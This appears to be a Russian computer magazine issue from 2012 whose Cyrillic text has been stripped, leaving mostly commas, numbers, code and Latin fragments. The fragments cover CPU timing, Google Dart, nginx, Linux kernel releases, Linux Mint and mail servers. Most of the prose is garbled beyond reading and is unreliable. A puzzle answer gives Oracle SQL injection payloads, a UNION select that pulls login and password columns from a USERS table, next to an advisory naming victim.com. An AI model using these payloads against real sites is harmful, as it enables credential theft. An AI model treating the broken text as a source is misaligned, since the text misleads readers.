string DBStr = "Data Source=isostore:/gameDB.sdf". . ,

GameDB IDbConnection.
, .
,
.
,
(TextBox),
. ,

. 5.

. 4. Players

08 /163/ 2012

Windows Phone:
SDK 7.1,
, , . , ,
, , :).
.

! ,
, .
! z

089

R_T_T


2814789



,
, . , , ,
. ,
.
,
. ,
,
, .
,
.
?
,
RTT- ;).
. 32- ,
.
32- . ,
32-
?
, , ,
.
, ,

090

,
12 RTT-. ! ,
, .
,
, , 1 RTT-.
,
, .
, ,
, .
100%, (
1 RTT). 100%-
1/12 .
, Windows , 1 12 RTT.
100%- - , , , !

, , .
, . ,
.

08 /163/ 2012

2814789
,
.
, .
, , ,
, ,
. ,

RTT.
2814789
.

.
( , ) . , ,
,
. ,
, ALU.
, ,
4060
. ,

.
. . 1.
. 1.2 ( )
32- ,
86/64 .

,
.
88
, ,
256- .
1024
(256 ). , 11
32- (
).
1 ( ).
( , . . 2).

(. 1.7),
,
. ,
, , ,
.

XOR, ,
.
, ,

. 1.

. 2.

(. 1.7).


(
), -
, .
, ,
1 RTT-.
2 RTT-.

2814789
.
,
.

,
.

- .
.

, - - .
(FPU, )
,
,
. , , ,
. ,
,
.
,
, 3264
. ,
,
. (
), .
, (),
FPU, . -

,
32-
08 /163/ 2012

091


,
.
,
. , .
, ,
, .
,
.

, . :
/, ,
.
,
. , , .
: , .
. 3.
. ,
. , , , .
. ,
, . 1
2.
,
.
, ,
.
( ),
MMX-. ( ) ,
.
, ,
, .
,
,
,
,
.

64- ,
( 16
!).
2 ( ).
, 2 RTT-. ,
.
( 1)
352 , 8 , ( 2) 416
, 16 . ,
80 144
3,6 .

092

. 3.

:
, 15% , , ,


, ,
Intel,
, .
.
AMD, .
,
.
, ,
,
.

SSE- AVX-

2814789
86/64
SSE 16 FPU ( )
.
,
, SSE-.
SSE-
16 . , SSE- .
,

SSE-. ,

SSE-.
AVX-.
, SSE-
,
, SSE-
.

SSE- . 4.
SSE ,

:
,
(APIC).

08 /163/ 2012

. 4. SSE-

. 5.

, .
SSE-
, ().
(
, - ).

. Intel . . 6. . 7
SSE-,
.

,
, .
FPU
, . 128
32 .
, ,
... !
, FPU SSE
.
, , ,
Q, D, W, B,
,
SSE.
SSE-
32- ; ,
P, D.
32 ,
.
, , 3, .
, ! FPU,
.
,
FPU
.
, -



.
SSE- FPU .
,
, SSE.
16 SSE--.
SSE- FPU, (. 5).

,

.
:
, .
, , , .
AVX.
,
. .

AVX VPSHUFB.
, , .
, ;
, -

08 /163/ 2012

. 6. Intel

093


4,
. , , ....


SSE- , FPU .

.
472
. ,
3,6 59 , 236
.
580
. ,
3,6 49 ,
392 .
, 3 4 RTT, 4 8 RTT. SSE-
, ,
. 20%-
.

AVX-, Intel,
AMD. AMD, .
, , :
AMD , XOP, ,
.
. ,
3 4, ,
: ,
.
, .
,
256- (YMM-),

. , ,
256- (FPU 128 ).
,
16 YMM- .
, , , 256- ,
16
.
600700 FPU
256 .
16 RTT, ,
.


. 12 RTT-,
,
FPU. Intel ,
, !
, , .
.
, . -

094

. 7.


. ,
, ,
.
50% ,
-, , 100
.
( 8 RTT),
. 500
, .
, ,
.
Intel, AMD
FPU ( ). ,
.
,
,
,
SSE- 12 RTT.
, , , AMD 12 RTT
. ,
.

?
, .
,
, , . ,

. , AES.
, , AES- ,
100150 , !
, ( 256 ).
86/64,

.
,
. 36 RTT , 12,5 RTT,
, , .
, - .
:
,
. ( )
, , , . z

08 /163/ 2012

(ivinside.blogspot.com)



,

1

,
.
. ,
?

, ,
!
. ,
, ,
.
. ,
,
.
. : ,
, . ,
, !
,
, .
.
,
.
. : , , .

. ,
! , .

100 .
99%.
98%. ?
: , , , /. .

096


, , teas:


.


. , , . 99%,
, 1%.
99 1 . 98%
2% . , , , . ,
2% - .
, 100% * * 50 . , ,
.

-
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?

ERROR at line 15: ORA-01790: expression must have


same datatype as corresponding expression
,
SELECT, UNION.
SQL-
Oracle :
script.php?id=-1 union select 1,2,3,4,5,6,7,8 from USERS-SQL ERROR OCCURED:Error: 1790 ORA-01790: expression must
have same datatype as corresponding expression

Oracle
SQL-, , MySQL
.
,
. , :

08 /163/ 2012

script.php?id=-1 union select 1,null,null,null,null,null,


null,null from USERS--



, . / , :
script.php?id=-1 union select 1,login,password,null,null,
null,null,null from USERS where id=1--

pCycle = true;
else
{
pCurrent->bVisited = true;
pCurrent = pCurrent->pNext;
}
}

,
. :
p1 = p2 = head;

( security
advisory), ,
.
.
securitylab.ru:
: 15.06.2012
:
:
: 1
CVSSv2 : 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE ID:
:
:
:
: script.php victim.com
:

SQL- .
-
id script.php
:

,
?

, ,
.
. , , . , :
struct Node {
...
bool bVisited;
};

, ,

. , (bVisited == true).
, :
bool bCycle = false;
pCurrent = pHead;
while (pCurrent && !pCycle)
{
if (pCurrent->bVisited == true) // , !

08 /163/ 2012

do {
p1 = p1->next;
p2 = p2->next->next;
} while (p1 != p2);

p1 p2.
, p2 , p1.
, , p2 p1. ,
,
. z


1. . , ,
(
, ).
, , . .
, , ,
,
. .
?
2. , ,
. ,
- ,
( ,
), (
). ,
, ,
. .
, .
,
. ?
3. Cisco IOS.
. ( ),

.
:
.
4. .
,
.
. : IE6+, FF3.0+, Opera
9.5+, Chrome 4.0+.

097

Spider_NET (www.vr-online.ru)


:
?
GOOGLE
Google . ,
Noop ( ,
) Go (
). 2009
, ,

,
.
, Google ,

. (,
) , C# Microsoft Delphi
Embarcadero. Google

098

Google ,
.
:
,

. Dart.

,
. ,

, .
.
, ,
.
, -,
2009 . ,
Go Noop. ,
.
2010-,
:
JavaScript (Future of Javascript doc from our
internal JavaScript Summit).


,
web-.


.
Dash ( Dart)
,

.
?
-
, , .
PHP,
Python, Java, Ruby, ++,
JavaScript.

,

08 /163/ 2012

-, Dart JavaScript


.
,
.
, -,
,
JavaScript
, ,
, .
Google,
JavaScript
( , , )
,
.
,
.
JavaScript Dart, ,
.
:
.
JavaScript ,

, CoffeeScript jQuery.
Dart , ,
( ),
JavaScript .
.
.
.
HTML5 Flash
, ,

. -

08 /163/ 2012

Dart

ECMAScript (a- JavaScript)


,
,
Dart
.
. , Dart
,


, .
. -

, .
,
.

,
,
, IDE
, ,
.
,
Google ,
.

JavaScript (
Harmony). , ,
-,
Darta.


- : ,
, ,
,
.
, ,

,

. , , ,
,
.
:

,

.

. , ,
, .

. Dart ,
jQuery.
, , ?
:
: Dart
, JavaScript
, ,
JavaScript jQuery,
.
, ,
.

Dart? Google
.
JavaScript,
2005-. JS ,
jQuery . ,
.
, Google
-
-

099


JavaScript- Dart ,
?

Dart
: , ,
? .
: , ?
: !
,
,

180 .
,
- .
Wave Buzz.
, ,
,
(Wave)
(
Buzz Google Plus).

.
: ;)
: Plus, Wave Buzz
, Dart . !
Dart , Google Web Toolkit
( ).
.
GWT -
enterprise.
HTML/CSS/
JavaScript.
Java,
MVC-.
GWT
JavaScript.
, .

Sunflower

100

Dart

Dart'

, ,
,
.
GWT .

. ( Google)
.
.
GWT ,

.
:

Flash,
,
.
,
80% Dart

.

Google Chrome Internet Explorer. Dart Chrome . Google
.
IE, Opera, Safari, FireFox?
,
Mozilla Opera Software, Apple
Microsoft ,
, .
, .
Dart IE
.
:
JavaScript. .
:

:

Dart
.
,
,

/.

Dart.

Spirodraw

08 /163/ 2012

: !
,
, Dart -
, ,
.
. Google ,
(HTML5, CSS3).
:
:
, JavaScript? Dart
(class oriented language).
, ,

C#, Delphi, Java.
- ,
Dart
. JavaScript . . ,
, ,
,
JS
.
Google ,
, :
. JavaScript
,
.

.
JavaScript,
( CoffeeScript), .
: - !

:

, -.
IDE,
JavaScript-. (, WebStorm), Open
Source (, Aptana studio).


( ). , ,
,
JavaScript.


.
?
: ,

:

,
Dart
( Chrome).
JavaScript
,
Dart , V8 (V8 JavaScript
engine). , .

. , -
, ,
, .
: ,

DART?

DART

Dart
(
Wikipedia ).
Google c 2004 . Dart Google Chrome. ,

( ). Dart .

( )
- Google.

08 /163/ 2012

HELLO WORLD DART


Dart? ,
Hello
World.
Dart
, Java C#:
//
main() {
print('Hello, world!');
//
}
(, ,
)
Dart (goo.gl/DNudD) .

, , -,
, -,

.

Dart,
,
.
Dart ,
.
.

Dart ? :
.
, Dart ,

.
,
(
), ,

. z

goo.gl/xm9qK Dart;
goo.gl/LKtMW Dart.
,
Dart;
goo.gl/y3CvR ( Darta) Wikipedia;
goo.gl/0pyFH Dart Wikipedia;
www.dartlang.org/docs/language-tour/ Dart;
goo.gl/T49aK ( ) Dart
JavaScript;
code.google.com/webtoolkit - Google;
goo.gl/LtAm7 Dart.

101




.
-

,
,

, ,


,
.

, ,

, , Photosight.ru .


, .


102

08 /163/ 2012

. 2


, .
, :
,
,
.
. , ,
, ,
- .
, . ? ,
-, . ; , ,
, .

?
-,
,

. , nginx 10
keep-alive- 2,5 .
-
, ( , , , sendfile nginx).
( ) ,
. PHP- Perl
.
nginx
, . nginx 810 ,
mod_perl 200 .
, 16
40 mod_perl, .


, ,
CSS-, ,
. nginx (

) , ,
.

.
,
?
, Facebook.

, CSS- JavaScript-
.
-

, .
,
,
. ,


.

.
, .

,

.

, nginx (


: , , - (, , ),
.

08 /163/ 2012

103



Mongrel2, Ruby-.
Ruby- , . ,
- ,
. ,
.
. .

) (, URI
),
.
, , , nginx
.
nginx
.

,
. .
Nginx . ,
( , , ), .
-. , , URI- GET-.
.
.
,

.
nginx . proxy_cache_lock.

.
-. , , ,
.

104

,
, .
,

.




JavaScript-, .

,
- .


.

Facebook.
JavaScript.

,
.
Facebook

.
JavaScript, . ,
. ,

, :
,
.
, ,
. ,

Java-,
,
GWT (Google Web Toolkit).

Microsoft Web Forms,

JavaScript ,
.
:
.

,


-
JavaScript.



, , , .


3040 ,

, .

(upstreams), ,
.

.
.
, URI /messages/
, /photo/
,
.

08 /163/ 2012

. 2

.
- , ,
,
.
2. ,
(
LA
).
. LA
,
Gone Away (

).

,
,

.




.
,
, , (rbc.ru)
.
- .

, ,
GPRS,
, ,

, .
,
nginx.

nginx.

,
,
,
. -
, .

. ?

HIGHLOAD-


, , .
, ,
-. , . ,
.
:
I. ,
. :
1.
.
2. ,
.
3. ,
( ).
II. :
1. -

08 /163/ 2012

.
nginx
.

, .

, nginx


. (
,

nginx

nginx.)


, , .
, ,
,
, ,

.

.


.
,
nginx.
.
,
,

.

HighLoad++.



Erlang.

Erlyvideo.


,


MySQL. NoSQL
Tarantool.


-

,

.

105

, . ,
, .


,
, . . -

, .
, . , .
.
, .

, .
(
), ,
. , ,
.
- - . , ,
.
. .
, 2001 ,
. spylog.ru, DNS
, , www1.spylog.
ru, www2.spylog.ru, www3.spylog.ru.
- . IPVS, NAT. ,
, .
, ,
. .
,
ping. ,
.
. , ,
, .
, , .
.

DNS-
. , ,
DNS-, ,
, DNS.
TTL (
, ). -
, , , ,
.
, , ,
. TTL .
, . , ,
DNS- , IPVS,
.
-
. .
,
,
,
.

,
.
, .
IP-.
. ,
IP- .
CARP (
FreeBSD), Heartbeat ( Linux)
.
Rambler, , , .
DNS-,

,
.

.
. ,
upstream , .

.
- ,

upstream, ,
, .
,
, .
Nginx .
, ,
-,

. , ,
.



. ,
,
,
- .
, .
,
. z


, . ?

106

08 /163/ 2012

!
8-800-200-3-999
+7 (495) 663-82-77 ()



40 % .

6 1194 .
12 2149 .

6 810 .
12 1499 .

6 1110 .
12 1999 .

6 894 .
12 1699 .

6 564 .
13 1105 .

6 599 .
12 1188 .

6 1110 .
12 1999 .

6 810 .
12 1499 .

3 630 .
6 1140 .

6 895 .
12 1699 .

6 690 .
12 1249 .

6 775 .
12 1399 .

6 1110 .
12 1999 .

6 1110 .
12 1999 .

6 950 .
12 1699 .

shop.glc.ru

UNIXOID

(execbit.ru)



LINUX 3.0 3.4

Linux

.

,
Linux-,

, -.
,
?

108

08 /163/ 2012


3.0
Linux,
, , .
2.6
,
4.0 5.0.
, ,
API
, Linux
. 3.0 ,
2.6.40.
. ,
/ (2.5 , 2.6 ),
, .
X.Y.Z, X (
3), Y , Z , ,
.
3.0
. ,
,
, , .

.

LINUX 3.0: XEN DOM0, INTEL SMEP,


CLEANCACHE, WAKE ON WLAN
Linux 3.0 Xen . Xen

.
xen-blkback,
, 3.0 2011
,
dom0. Xen Linux .
3.0 SMEP (Supervisor Mode Execution Protection),
Ivy Bridge
Intel. SMEP ,
, , . ,
shell-,
.
, , Cleancache.
,
.
Cleancache , -,

. Cleancache,
,
, .
(Transcendent
memory) ext3, ext4, Btrfs, OCFS2 Xen.
3.0
sendmmsg(), sendmsg(),
.
, .

08 /163/ 2012

,

2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2

389
566
545
553
612
709
736
815
801
673
767
870
912
1057
1123
1027
1021
1075
1180
1150
1166
1248
1196
1150
1187
1176
1276
1198
1258
1131
1168
1316

68
90
94
90
108
111
120
133
128
138
143
180
181
193
232
203
187
212
233
249
227
261
238
243
209
207
221
220
239
331
212
226

All

7944

855

Kernel Version

109

UNIXOID


UDP- 20%, RAW- 30%.

. Linux-
Wake on WLAN,
S3
.
, , .
BPF (Berkeley Packet Filter), , JIT- ,

, tcpdump Wireshark.
Btrfs.
,

. Btrfs ,
,
.
. btrfs filesystem defragment.
Btrfs , , ,
.
.
1520% b+ .
RAID- Btrfs
Quasi-round-robin,
, -

110

. .
3.0 9862 1276 , 44 ( 8002
, 7946 ). 41% , 25% , 15% , 5% 5%
.

LINUX 3.1: OPENRISC,


ISCSI, NFC
3.1 3.0,
.
OpenRISC, , 32- OpenRISC 1000.
OpenRISC (opencores.org/or1k/Main_Page)
OpenCores,
, ,
. , firmware, GPL
LGPL.
.
OpenRISC 1200
ORBIS32, ,
, , DSP,
. ARM10.
3.1
NFC (Near Field Communication), (10 ).
NFC ,
.

08 /163/ 2012

,

Kernel Version

2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2

2005-03-02
2005-05-17
2005-08-28
2005-10-27
2006-01-02
2006-03-19
2006-06-17
2006-09-19
2006-11-29
2007-02-04
2007-04-25
2007-07-08
2007-10-09
2008-01-24
2008-04-16
2008-07-13
2008-10-09
2008-12-24
2009-03-23
2009-06-09
2009-09-09
2009-12-02
2010-02-24
2010-05-15
2010-08-01
2010-10-20
2011-01-04
2011-03-14
2011-05-18
2011-07-21
2011-10-24
2012-01-04

kernel.org

08 /163/ 2012

69
108
73
61
68
77
91
95
72
68
81
75
94
108
83
88
88
76
89
78
92
84
84
81
77
80
76
69
65
64
95
72

NFC,
, , , ,
, , . Android
NFC Ice Cream Sandwich.
3.1 Writeback,

, ,
,
-. RAID , bad-. ,
iSCSI target, Linux-iSCSI.org. Btrfs
,
. ext3 -
, ,
. , XFS, Btrfs ext4.
cpufrequtils
cpupowerutils. ,
cpufrequtils,

: , GPU CPU, .
. Xen dom0
VGA-, PCI- Memory hotplug
balloon, KVM
,
.
9403 1318 , 49 .
37% , 25% , 14% , 5%
5% .

LINUX 3.2: DM THIN PROVISIONING,


EVM,

3.2 , 3.0 3.1,
Writeback,
Btrfs ext4, RAID.
Writeback, 3.1,
.

. ,
,
- ,
. ,

.
cgroups
, .
,
, ,
. ,
,
.

111

UNIXOID

TPM.
3.2 99 , 40%
, 23% , 15%
, 3% , 4%
.

BTRFS
170 000
, 60 000
EXT4

LINUX 3.3: ANDROID,


EFI, BUFFERBLOAT, OPEN VSWITCH

3.2 ext4 1 .


.
,
1 1 .
1 mkfs
e2fsprogs 1.42.
3.2 Btrfs. 3.0

(
89 43 ).

'-o recovery'.
,
xfstests 445 28 .
RAID Device Mapper
(thin provisioning),
, . ,
,
. ,
,
,
.
EVM (extended verification
module), , ,
(, LiveCD), ,

3.3 , ,
Android.
, - Google
.
staging- , Google
.
Android , ashmem ,
;
Binder,
Android; ram console
,
; logcat , ; LMK
(low memory killer)
, , ;
gpio.
3.3 Linux , EFI (Extensible Firmware Interface),
. (), ASPM (Active State Power
Management),
, 2.6.38.
procfs hidepid, /proc/PID
. ,
gid, .
,

Teaming,
, .
:
round-robin active-backup. , libteam.

LINUX
1991

1992

1993

1996

1998

1999




...


Linux


Linux
GPL,

Slackware

,




Linux

IT-


Linux

Red Hat

112

08 /163/ 2012


net_prio cgroups,
SO_PRIORITY,
, .

,
, (latency) , ,
.

Open vSwitch, (][_05_2012).
3.3 15 ,
5,6 , 1,8
, 700 ,
533 , 493 .

. , . Chrome OS
.
Yama,
Canonical
Ubuntu. Yama
:
ptrace , ;
( /tmp) ;
, / , .
Yama .
3.4 Btrfs.
,

,

(COW) Linux VM, , 64 .

(,
170 000 , 60 000 ext4).
Btrfs SUSE
. ,
, .
1200 ,
10 000 . , 40%
, 30% , 13% , 5% 6% . 42 .

LINUX 3.4: X32 ABI, YAMA,


GPU
3.4 X32 ABI,
x86_64 x86. X32 ABI

x86_64
32- x86. x86_64, , X32 ABI,
( 30%) ,
4 .
3.4 , ,

.
,
(,
). , ,
/sys,
udev.
Device Mapper verity,
.
, -
,

, Linux
. ,
,
.
, , ,

. z
INFO

2003

2005

2007

2010

2011


3.0 Linux
DFS Windows
2008.

IBM

Linux

08 /163/ 2012


BusinessWeek

Linux

Linux Foundation

Linux


Linux Android

Linux
20,

,
, ATM,


3.0
Linux

Microsoft
Kinect, ,
,


-.


ext4
3.0
punch
hole,


,


.


, 3.1


3.1 2.6.41.

113

UNIXOID

(grinder@tux.in.ua)

LINUX
MINT 13 MAYA



Linux-.
,



GNOME 3 Unity ,
-,
. ,
.

114

08 /163/ 2012

Linux Mint

UBUNTU?
Linux Mint
Open Source.
, Linux ,
. ,
(2006 ) ,
, .
Linux Mint Ada Kubuntu 6.06
Dapper Drake , , . ,
Linux Mint ,
.
GNOME,
KDE, XFce, GNOME-
. Linux
Mint , .
, .
, .
,
GNOME.
Distrowatch Linux Mint 2007 ,

Linux, , Debian, openSUSE, Fedora.
GNOME 3,
.
( ,
GNOME 3 User Experience).
Ubuntu Unity.
Linux Mint 11 Katya, Ubuntu
11.04, GNOME 2.
Ubuntu Distrowatch.
,
, Linux Mint 12
Unity GNOME 3. ,
Linux Mint, . Mint 12
GNOME 3, (Mint GNOME Shell Extension)
. DVD- MATE

08 /163/ 2012

Cinnamon

( GNOME 2), KDE4 LXDE.


GNOME 3 ,
MATE Cinnamon.
Linux Mint Ubuntu.
( ) . : , Ubuntu,
, ,
,
(3.0 Cassandra, 3.1 Celena).
Ubuntu, Linux Mint
, , x86/x64,
.
Linux Mint Debian Edition
(LMDE) rolling-,
Debian MATE/Cinnamon Xfce.

LINUX MINT 13 MAYA


Linux Mint 13
Ubuntu 12.04, . DVD-: MATE 1.2 (898 ),
Cinnamon 1.4 (817 ). mint-metamate mint-meta-cinnamon .
- Windows (mint4win) x64- .
CD-,
- ,
.
How to remaster/respin Linux Mint ISO images (goo.gl/BCeau).

UBUNTU,
LINUX MINT

,
,
X86/X64,
115

UNIXOID

MATE

12- ,
.
Wi-Fi- Broadcom b43,

b43.blacklist=yes, GRUB .
,
. ,
, LibreOffice ( ).
.
, .
MDM, MATE
GDM 2.20. mdmsetup
.

CINNAMON

, .
,
, . , Cinnamon
( MATE) . , ,
Windows, .
Windows , Maya .
USB- ,
.
Cinnamon, ,

. -
: ,
, ,
. , ,
,
.
mintMenu.
,

116

MDM

,
. - .
, , ,
,
(SSH, FTP, WebDAV
Windows).
, e-mail, .
Windows Live Google
. ,
, .

Mint-X Mint-Z, GTK3+
. ,
. , , , , ,
Cinnamon (cinnamon-settings.py),
mintDesktop. Cinnamon
, .
, Cinnamon
cinnamon-spices.linuxmint.com. Mint
, PPA. :
$ sudo add-apt-repository ppa:bimsebasse/cinnamonextras
$ sudo apt-get update

WWW


LINUX MINT 13
Linux 3.2.0
Udev 175
GCC 4.6.3
X.Org 1.11.4
MATE 1.2
Cinnamon 1.4

LibreOffice 3.5.3.2
VLC 2.0.1
FileRoller 3.4.1
Evince 3.4.0
Totem 3.0.1


Linux Mint
linuxmint.com;



Linux Mint

goo.gl/BCeau;

,

Cinnamon
cinnamonspices.linuxmint.com.

08 /163/ 2012

INFO

MONEY, MONEY, MONEY

UBUNTU 12.04

Linux Mint
. ,
, ;
,
(Yahoo, DuckDuckGo Amazon).
.
Yandex.

Ubuntu 12.04 Precise Pangolin


2012 (LTS)
,
( LTS - ).
, ( ),

. 12.04
Unity 5,
Head-Up Display (HUD), (
),
Nautilus.
, Software Center,
Rhythmbox ( Banshee), UbuntuOne Music Store.

Ubuntu One ,
, .
3.2.14, : DRM- i915,

seccomp
filter,
( ), ALPS
. amd64
, -generic
-server.
, Ubuntu
12.04
Openstack. Upstart
1.5.
Ubuntu 12.04
, cloud-.
CD- (696 ) DVD(1,6 ) amd64 i386,
CD- ARM- Toshiba
AC100/Dynabook AZ, Freescale i.MX5x, Texas
Instruments OMAP3 OMAP4.
: Kubuntu
(KDE 4.8), Xubuntu (Xfce 4.8), Lubuntu (LXDE),
Mythbuntu, Edubuntu (
) Ubuntu Studio ( ).

:
$ sudo apt-cache search cinnamon-theme

. ,
,
~/.themes (), ~/.local/share/cinnamon/applets
() /usr/share/cinnamon/extensions ().
cinnamon-settings,
.

LINUX MINT
, ,
. ,
(mintInstall),
. ,
,
, (
), .
. .
( ) .
, Linux Mint. Ubuntu (Ubuntu Software Center)
mintInstall , ,
,
.
Synaptic, , , ,
mintInstall .
Cinnamon , ( MATE ),
mintUpdate .
mintUpdate ,
. Linux Mint
, Ubuntu,
. ,
,
13- . 4- 5-
mintUpdate .

Linux Mint 13

,
2017 .


From freedom
came elegance,

,

Linux Mint

,

,
x86/x64,
.

: , ,
,
08 /163/ 2012

117

UNIXOID

mintUpdate

mintInstall

MATE
mintDesktop ,
: , ,
, . Cinnamon ( ).
mintBackup . mintWifi
Wi-Fi-, ( ):

mintNanny , .
, /etc/hosts:
0.0.0.0 odnoklassniki.ru # blocked by mintNanny

mintWelcome, .
DVD mintconstructor.

$ sudo mintwifi

mintUpload , FTP/SFTP/SCP-
. -

, Linux Mint
, . Cinnamon
,
. z

MATE VS CINNAMON
GNOME 3,

GNOME Shell, . ,
,


GNOME 2. .
MATE (mate-desktop.org)
Arch Linux
GNOME 2.32.
GNOME, , . ,
Nautilus Caja.
,
Gtk2/3-. -

118

1.2, , , , .
(,
Bluetooth)
, GNOME 2.
GTK3, .
Mint GNOME Shell
Extensions, Linux Mint 12,
,
GNOME Shell , MGSE

. 2012
Cinnamon (cinnamon.
linuxmint.com), , Linux Mint.
, -


.
Mutter Muffin. ,
, ,
, , GNOME Shell.
, MATE ,
Cinnamon .
1.4
. MATE
3D-,
Cinnamon OpenGL.

Linux.

08 /163/ 2012


.

.

-,
.
.
TSW ,
. ,

, .

TSW.
-, ,
, . -


( )

. , . 14/2
(495) 231-4383
. , . 29
(499) 724-8044

-, . 1
(812) 603-2610


TSW.
,
( ),
.

( ,
),
. ,
TSW,
.

. , . 10, . 32,
(495) 231-2363
www.kolrad.ru

www.allrad.ru
(495)730-2927/368-8000/672-7226
www.prokola.net
(812)603-2610/603-2611

UNIXOID

(execbit.ru)

0120

08 /163/ 2012


,

UBUNTU LINUX 8-


Ubuntu Linux.
8- ATmega1284p, 256
MMU.
, ,
Google.

Ubuntu Linux
(goo.gl/CM3bJ). , ,
,

SIMM 16 SD- 1 .

. ARMv5TE,
Ubuntu 9.04.

6,5 ,
ATmega1284p 24
( 20 ), , ,
: ,
Linux.
Ubuntu,
, .

, ,
,
, ,
Google, .
, .
, ?
-, A .
VMware, Kno, Lab126 (Amazon),
Google.
PalmOS (
), Android
iOS.
46 (
4). -

08 /163/ 2012

(University of Illinois) UrbanaChampaign.


1999-.
, .
.
,
.

( Amazon
Google)
, .
,
. AVR
,
, AVR-GCC
.
, AVR-GCC -
:). RAM,
,
. , ,
AVR
RAM,
- !

. AVR-GCC
int 16- ,
.
. , :
, .
, . ,
,
32- 33
0, AVR-GCC 1
. , .
. . , .
, ,
, ,
. ,
56 kernel is up.
,

.
.


?
-
A ,
,
,
/.
,
, ,
, :).
.
, .

, .
. ,
.
VoIP-.
,
.

Linux
?
?
,
A .
.

DGOS
Android Palm

121

UNIXOID
.
, ,
. -,
. , .
.


ARM?
:
A ARM,
PalmOS,
.
- , ARM.
x86 MIPS. 86 , MMU MIPS .

Ubuntu, -
Embedded? Proof of concept?
, ,
A
, , Ubuntu
.
.
,
,
CentOS.

PALMOS
PalmOS.
DGOS (dgosblog.blogspot.com) ,
, POSIX
PlamOS. : PalmOS- PowerSDHC,
SDHC ;
BluePill, -,
,
;
warpSpeed . palmpowerups.com.

MMU)


?
,
A -
8 .
8-, 16- 32- (
).
: AVR PIC18.
PIC18 (
), .

dsPIC33 ( AVR),
PIC32.

, ,
no-MMU, -

.
,
MMU .
- .

, , ,
. ?
-
? C++?

A , -


MMU? (uClinux, ,

. , ,
.
, x86 for(char i = 0; i < someVal;
i++) for(int i = 0; i < someVal; i++)
, ARM
; ARM
, 1 .
,
, 8 ,
char.
.
C++ ,
. C++, ,
(, ).
,
,
C++.
,
Google. ?
Android
A Android
Android.
Google I/O.
Accessory
Development Kit.
google.com. . :)

Accessory
Development Kit.
?
Accessory Development Kit
A , Android
, .
1 ADK,
: goo.
gl/Ztsfo, goo.gl/OG0LM. 1
. 2 .
.
,
Google I/O .

Google
:
, ,
.
?

ATmega 1284

122

08 /163/ 2012

SD-

, . Google

. ?
44. ? 45.
? 41. . Google
( - ),
. ,

Google- .
,
,
.
. .
, Google
, , 5080%
. .

, Lab126,
VMware, Kno.
,
A .
.
, ,
,
, .
:). , ,
, ,
.


?
. :)
Amazon ,
A . Kno: goo.gl/z5mH9.
, Intel Kno 30
.
. VMware
VAssert, ,
Replay Debugging.

08 /163/ 2012

Kno.
? ,
?
, ?
Kno :
A ,

.
14- ,
, ,
. Linux
( Android). , - 100
,
Intel Kno ,
.


DGOS?
?
?
:
A dgosblog.blogspot.com.
PalmOS
.
, , ,
, Palm , , .


DGOS -
?
, ,
A , - .
. , .
.


-
DGOS?

.
.
, , - mesh
networking. .

?
?
, .
A ? (-
) ,
, .
.
, ,
5700 .
.
,
. ,
. ,

.


. .
,

. ,
105 /,
300.
. :)


?
,
? :)

A .
, . ,
, . z

123

SYN/ACK

(grinder@synack.ru)

WARNING

CommuniGate Pro


8010

.

,

-,


,

,
,

.


,
.
124

08 /163/ 2012

iRedMail
: iRedMail
: iredmail.org
: GNU GPL
: *nix

*nix
, ,
.
iRedMail
. ,

,
Postfix/Dovecot
SMTP, POP3 IMAP.
,
( )
.
,
.

,

IndiMail
: IndiMail
: indimail.sf.net
: GNU GPL
: *nix

SMTP, IMAP, POP3,


QMQP, QMTP, DKIM BATV (Bounce Address
Tag Validation)
. Open
Source : Qmail, Courier IMAP/POP3,
serialmail ( ), qmailanalog (
), dotforward, fastforward, mess822,
daemontools, ucspi-tcp, Bogofilter, Fetchmail
.

. SMTP, IMAP POP3,

. , .
hostcntrl,

. IndiMail

. .

08 /163/ 2012

*nix. OpenLDAP MySQL,


.
,
, .

SpamAssassin
ClamAV, , SPF (Sender
Policy Framework), DKIM (DomainKeys Identified
Mail), HPR (HELO Randomization Prevention),
Spamtrap , , .
iptables Fail2ban.
iRedAPD (Access Policy Delegation),
Postfix,
.
- Roundcube WebMail, phpLDAPadmin, PostfixAdmin,
phpMyAdmin AWStats
. iRedAdmin, : Open Source
iRedAdmin-Pro.

,
( , Qmail). IndiMail
(queue
collection),
qmail-send/qmail-todo
.

, Qmail.

,

( 200). ,
CONTROLDIR , QUEUEDIR .
IndiMail
,
, . :
IndiMail,
.
FLASH ( Ncurses).
MySQL,
OpenLDAP.
systemd.
,
SETUID,
//, trust partitioning,
IP, access-list,

iRedMail

,

.
; MySQL, ,
( ).
i386/x86_64
Red Hat Enterprise Linux, CentOS,
Gentoo Linux, Debian, Ubuntu, openSUSE Open/
FreeBSD.
, .

- iWebAdmin QmailAdmin

tcprules, , TLS/SSL
.
IndiMail 32/64 *nix
.
,
Linux (RHEL/CentOS
5/6, Fedora, openSUSE/SLE, Mandriva, Debian
Ubuntu). 45
( /var/indimail/bin),

- iWebAdmin (
QmailAdmin), .

125

SYN/ACK

Rumble
: Rumble
: rumble.sf.net
: GNU GPL
: *nix, Windows

, SMTP
(ESMTPSA), POP3 IMAP. , .
.
C/C++, API
(Lua C/C++). . SSL/TLS, SQLite MySQL,
(MD5/PLAIN/STARTTLS),
white/grey/
blacklist, SpamAssassin, BATV VERP
(Variable Envelope Return Path).
.
x86/
x64- Linux (Generic,
Ubuntu, Debian). ,

,
.


. rumble.conf. - (
2580) modules/rumblelua/auth.cfg (
), - .
,
,
, .

SQLite,
MySQL,
.
,
.
,
. ,

RumbleLua User
.
,
, ,
, ,
,
. ,
.

Axigen: - -

Axigen

Active Directory, .
, ,
, MAPI, OP3- IMAP-.

. ,
IM-,
Jabber/XMPP. , Axigen
,
.
TLS/SSL,
:
plain, login, cram-md5, digest-md5 .
(Kaspersky, Dr.Web,
Symantec, ClamAV ) (
SpamAssassin).
SPF, DKIM, // IP / .
.

